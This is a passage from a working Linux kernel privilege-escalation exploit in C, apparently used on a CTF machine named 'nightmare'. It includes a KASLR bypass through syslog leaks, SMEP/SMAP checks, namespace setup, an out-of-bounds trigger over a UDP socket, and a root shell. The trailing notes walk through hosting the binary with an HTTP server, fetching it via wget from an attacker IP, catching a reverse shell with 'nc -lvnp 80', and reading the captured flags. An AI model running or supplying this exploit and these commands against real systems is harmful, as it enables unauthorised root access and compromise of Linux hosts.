572. *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
573. if (*size == -1) {
574. perror("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)");
575. exit(EXIT_FAILURE);
576. }
577.  
578. *size = (*size / getpagesize() + 1) * getpagesize();
579. *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,
580. MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
581.  
582. *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
583. if (*size == -1) {
584. perror("[-] klogctl(SYSLOG_ACTION_READ_ALL)");
585. exit(EXIT_FAILURE);
586. }
587. }
588.  
589. unsigned long get_kernel_addr_trusty(char* buffer, int size) {
590. const char* needle1 = "Freeing unused";
591. char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
592. if (substr == NULL) {
593. fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle1);
594. exit(EXIT_FAILURE);
595. }
596.  
597. int start = 0;
598. int end = 0;
599. for (end = start; substr[end] != '-'; end++);
600.  
601. const char* needle2 = "ffffff";
602. substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
603. if (substr == NULL) {
604. fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle2);
605. exit(EXIT_FAILURE);
606. }
607.  
608. char* endptr = &substr[16];
609. unsigned long r = strtoul(&substr[0], &endptr, 16);
610.  
611. r &= 0xffffffffff000000ul;
612.  
613. return r;
614. }
615.  
616. unsigned long get_kernel_addr_xenial(char* buffer, int size) {
617. const char* needle1 = "Freeing unused";
618. char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
619. if (substr == NULL) {
620. fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle1);
621. exit(EXIT_FAILURE);
622. }
623.  
624. int start = 0;
625. int end = 0;
626. for (start = 0; substr[start] != '-'; start++);
627. for (end = start; substr[end] != '\n'; end++);
628.  
629. const char* needle2 = "ffffff";
630. substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
631. if (substr == NULL) {
632. fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle2);
633. exit(EXIT_FAILURE);
634. }
635.  
636. char* endptr = &substr[16];
637. unsigned long r = strtoul(&substr[0], &endptr, 16);
638.  
639. r &= 0xfffffffffff00000ul;
640. r -= 0x1000000ul;
641.  
642. return r;
643. }
644.  
645. unsigned long get_kernel_addr() {
646. char* syslog;
647. int size;
648. mmap_syslog(&syslog, &size);
649.  
650. /*if (strcmp("trusty", kernels[kernel].distro) == 0 &&
651. strncmp("4.4.0", kernels[kernel].version, 5) == 0)
652. return get_kernel_addr_trusty(syslog, size);
653. if (strcmp("xenial", kernels[kernel].distro) == 0 &&
654. strncmp("4.8.0", kernels[kernel].version, 5) == 0)*/
655. return get_kernel_addr_xenial(syslog, size);
656.  
657. printf("[-] KASLR bypass only tested on trusty 4.4.0-* and xenial 4-8-0-*");
658. exit(EXIT_FAILURE);
659. }
660.  
661. // * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
662.  
663. struct ubuf_info {
664. uint64_t callback; // void (*callback)(struct ubuf_info *, bool)
665. uint64_t ctx; // void *
666. uint64_t desc; // unsigned long
667. };
668.  
669. struct skb_shared_info {
670. uint8_t nr_frags; // unsigned char
671. uint8_t tx_flags; // __u8
672. uint16_t gso_size; // unsigned short
673. uint16_t gso_segs; // unsigned short
674. uint16_t gso_type; // unsigned short
675. uint64_t frag_list; // struct sk_buff *
676. uint64_t hwtstamps; // struct skb_shared_hwtstamps
677. uint32_t tskey; // u32
678. uint32_t ip6_frag_id; // __be32
679. uint32_t dataref; // atomic_t
680. uint64_t destructor_arg; // void *
681. uint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS];
682. };
683.  
684. struct ubuf_info ui;
685.  
686. void init_skb_buffer(char* buffer, unsigned long func) {
687. struct skb_shared_info* ssi = (struct skb_shared_info*)buffer;
688. memset(ssi, 0, sizeof(*ssi));
689.  
690. ssi->tx_flags = 0xff;
691. ssi->destructor_arg = (uint64_t)&ui;
692. ssi->nr_frags = 0;
693. ssi->frag_list = 0;
694.  
695. ui.callback = func;
696. }
697.  
698. // * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
699.  
700. #define SHINFO_OFFSET 3164
701.  
702. void oob_execute(unsigned long payload) {
703. char buffer[4096];
704. memset(&buffer[0], 0x42, 4096);
705. init_skb_buffer(&buffer[SHINFO_OFFSET], payload);
706.  
707. int s = socket(PF_INET, SOCK_DGRAM, 0);
708. if (s == -1) {
709. perror("[-] socket()");
710. exit(EXIT_FAILURE);
711. }
712.  
713. struct sockaddr_in addr;
714. memset(&addr, 0, sizeof(addr));
715. addr.sin_family = AF_INET;
716. addr.sin_port = htons(8000);
717. addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
718.  
719. if (connect(s, (void*)&addr, sizeof(addr))) {
720. perror("[-] connect()");
721. exit(EXIT_FAILURE);
722. }
723.  
724. int size = SHINFO_OFFSET + sizeof(struct skb_shared_info);
725. int rv = send(s, buffer, size, MSG_MORE);
726. if (rv != size) {
727. perror("[-] send()");
728. exit(EXIT_FAILURE);
729. }
730.  
731. int val = 1;
732. rv = setsockopt(s, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val));
733. if (rv != 0) {
734. perror("[-] setsockopt(SO_NO_CHECK)");
735. exit(EXIT_FAILURE);
736. }
737.  
738. send(s, buffer, 1, 0);
739.  
740. close(s);
741. }
742.  
743. // * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *
744.  
745. #define CHUNK_SIZE 1024
746.  
747. int read_file(const char* file, char* buffer, int max_length) {
748. int f = open(file, O_RDONLY);
749. if (f == -1)
750. return -1;
751. int bytes_read = 0;
752. while (true) {
753. int bytes_to_read = CHUNK_SIZE;
754. if (bytes_to_read > max_length - bytes_read)
755. bytes_to_read = max_length - bytes_read;
756. int rv = read(f, &buffer[bytes_read], bytes_to_read);
757. if (rv == -1)
758. return -1;
759. bytes_read += rv;
760. if (rv == 0)
761. return bytes_read;
762. }
763. }
764.  
765. #define LSB_RELEASE_LENGTH 1024
766.  
767. void get_distro_codename(char* output, int max_length) {
768. char buffer[LSB_RELEASE_LENGTH];
769. int length = read_file("/etc/lsb-release", &buffer[0], LSB_RELEASE_LENGTH);
770. if (length == -1) {
771. perror("[-] open/read(/etc/lsb-release)");
772. exit(EXIT_FAILURE);
773. }
774. const char *needle = "DISTRIB_CODENAME=";
775. int needle_length = strlen(needle);
776. char* found = memmem(&buffer[0], length, needle, needle_length);
777. if (found == NULL) {
778. printf("[-] couldn't find DISTRIB_CODENAME in /etc/lsb-release\n");
779. exit(EXIT_FAILURE);
780. }
781. int i;
782. for (i = 0; found[needle_length + i] != '\n'; i++) {
783. assert(i < max_length);
784. assert((found - &buffer[0]) + needle_length + i < length);
785. output[i] = found[needle_length + i];
786. }
787. }
788.  
789. void get_kernel_version(char* output, int max_length) {
790. struct utsname u;
791. int rv = uname(&u);
792. if (rv != 0) {
793. perror("[-] uname())");
794. exit(EXIT_FAILURE);
795. }
796. assert(strlen(u.release) <= max_length);
797. strcpy(&output[0], u.release);
798. }
799.  
800. #define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
801.  
802. #define DISTRO_CODENAME_LENGTH 32
803. #define KERNEL_VERSION_LENGTH 32
804.  
805. void detect_versions() {
806. char codename[DISTRO_CODENAME_LENGTH];
807. char version[KERNEL_VERSION_LENGTH];
808.  
809. get_distro_codename(&codename[0], DISTRO_CODENAME_LENGTH);
810. get_kernel_version(&version[0], KERNEL_VERSION_LENGTH);
811.  
812.  
813. int i;
814. for (i = 0; i < ARRAY_SIZE(kernels); i++) {
815. if (/*strcmp(&codename[0], kernels[i].distro) == 0 && */
816. strcmp(&version[0], kernels[i].version) == 0) {
817. printf("[.] kernel version '%s' detected\n", kernels[i].version);
818. //kernel = i;
819. return;
820. }
821. }
822.  
823. printf("[-] kernel version not recognized\n");
824. exit(EXIT_FAILURE);
825. }
826.  
827. #define PROC_CPUINFO_LENGTH 4096
828.  
829. // 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP
830. int smap_smep_enabled() {
831. char buffer[PROC_CPUINFO_LENGTH];
832. int length = read_file("/proc/cpuinfo", &buffer[0], PROC_CPUINFO_LENGTH);
833. if (length == -1) {
834. perror("[-] open/read(/proc/cpuinfo)");
835. exit(EXIT_FAILURE);
836. }
837. int rv = 0;
838. char* found = memmem(&buffer[0], length, "smep", 4);
839. if (found != NULL)
840. rv += 1;
841. found = memmem(&buffer[0], length, "smap", 4);
842. if (found != NULL)
843. rv += 2;
844. return rv;
845. }
846.  
847. void check_smep_smap() {
848. int rv = smap_smep_enabled();
849. if (rv >= 2) {
850. printf("[-] SMAP detected, no bypass available\n");
851. exit(EXIT_FAILURE);
852. }
853. #if !ENABLE_SMEP_BYPASS
854. if (rv >= 1) {
855. printf("[-] SMEP detected, use ENABLE_SMEP_BYPASS\n");
856. exit(EXIT_FAILURE);
857. }
858. #endif
859. }
860.  
861. // * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
862.  
863. static bool write_file(const char* file, const char* what, ...) {
864. char buf[1024];
865. va_list args;
866. va_start(args, what);
867. vsnprintf(buf, sizeof(buf), what, args);
868. va_end(args);
869. buf[sizeof(buf) - 1] = 0;
870. int len = strlen(buf);
871.  
872. int fd = open(file, O_WRONLY | O_CLOEXEC);
873. if (fd == -1)
874. return false;
875. if (write(fd, buf, len) != len) {
876. close(fd);
877. return false;
878. }
879. close(fd);
880. return true;
881. }
882.  
883. void setup_sandbox() {
884. int real_uid = getuid();
885. int real_gid = getgid();
886.  
887. if (unshare(CLONE_NEWUSER) != 0) {
888. printf("[!] unprivileged user namespaces are not available\n");
889. perror("[-] unshare(CLONE_NEWUSER)");
890. exit(EXIT_FAILURE);
891. }
892. if (unshare(CLONE_NEWNET) != 0) {
893. perror("[-] unshare(CLONE_NEWUSER)");
894. exit(EXIT_FAILURE);
895. }
896.  
897. if (!write_file("/proc/self/setgroups", "deny")) {
898. perror("[-] write_file(/proc/self/set_groups)");
899. exit(EXIT_FAILURE);
900. }
901. if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) {
902. perror("[-] write_file(/proc/self/uid_map)");
903. exit(EXIT_FAILURE);
904. }
905. if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
906. perror("[-] write_file(/proc/self/gid_map)");
907. exit(EXIT_FAILURE);
908. }
909.  
910. cpu_set_t my_set;
911. CPU_ZERO(&my_set);
912. CPU_SET(0, &my_set);
913. if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
914. perror("[-] sched_setaffinity()");
915. exit(EXIT_FAILURE);
916. }
917.  
918. if (system("/sbin/ifconfig lo mtu 1500") != 0) {
919. perror("[-] system(/sbin/ifconfig lo mtu 1500)");
920. exit(EXIT_FAILURE);
921. }
922. if (system("/sbin/ifconfig lo up") != 0) {
923. perror("[-] system(/sbin/ifconfig lo up)");
924. exit(EXIT_FAILURE);
925. }
926. }
927.  
928. void exec_shell() {
929. char* shell = "/bin/bash";
930. char* args[] = {shell, "-i", NULL};
931. execve(shell, args, NULL);
932. }
933.  
934. bool is_root() {
935. // We can't simple check uid, since we're running inside a namespace
936. // with uid set to 0. Try opening /etc/shadow instead.
937. int fd = open("/etc/shadow", O_RDONLY);
938. if (fd == -1)
939. return false;
940. close(fd);
941. return true;
942. }
943.  
944. void check_root() {
945. printf("[.] checking if we got root\n");
946. if (!is_root()) {
947. printf("[-] something went wrong =(\n");
948. return;
949. }
950. printf("[+] got r00t ^_^\n");
951. exec_shell();
952. }
953.  
954. int main(int argc, char** argv) {
955. printf("[.] starting\n");
956.  
957. //printf("[.] checking distro and kernel versions\n");
958. //detect_versions();
959. //
960.  
961. printf("[~] done, versions looks good\n");
962.  
963. printf("[.] checking SMEP and SMAP\n");
964. check_smep_smap();
965. printf("[~] done, looks good\n");
966.  
967. printf("[.] setting up namespace sandbox\n");
968. setup_sandbox();
969. printf("[~] done, namespace sandbox set up\n");
970.  
971. #if ENABLE_KASLR_BYPASS
972. printf("[.] KASLR bypass enabled, getting kernel addr\n");
973. KERNEL_BASE = get_kernel_addr();
974. printf("[~] done, kernel text: %lx\n", KERNEL_BASE);
975. #endif
976.  
977. printf("[.] commit_creds: %lx\n", COMMIT_CREDS);
978. printf("[.] prepare_kernel_cred: %lx\n", PREPARE_KERNEL_CRED);
979.  
980. unsigned long payload = (unsigned long)&get_root;
981.  
982. #if ENABLE_SMEP_BYPASS
983. printf("[.] SMEP bypass enabled, mmapping fake stack\n");
984. mmap_stack();
985. payload = XCHG_EAX_ESP_RET;
986. printf("[~] done, fake stack mmapped\n");
987. #endif
988.  
989. printf("[.] executing payload %lx\n", payload);
990. oob_execute(payload);
991. printf("[~] done, should be root now\n");
992.  
993. check_root();
994.  
995. return 0;
996. }
997.  
998.  
999. gcc poc.c -o poc
1000. after need to transfer on server we need to transfer port through 80,443
1001. on server goto on /home/decoder/test/
1002. on your system python -m SimpleHTTPServer 80
1003. on server
1004. wget http://10.10.??.??:80/poc
1005. after than give permission chmod 777 poc
1006. than close the python server and server again login
1007. because we can't root with decoder user group we only need ftpuser
1008. because only decoder can write on test folder not ftpuser because of that we need to change
1009. ./shell
1010. nc -lvnp 80
1011. now u got shell
1012. cd /home/decoder/test/
1013. ./poc
1014. u got root
1015. root@nightmare:/root# cat root.txt
1016. cat root.txt
1017. a1604f74e9d1c201f7ddf3bf5b356f89
1018. root@nightmare:/root# cat /home/decoder/user.txt
1019. cat /home/decoder/user.txt
1020. d75ce743ecd84db14c759ee23d2cb1a5
1021. root@nightmare:/root#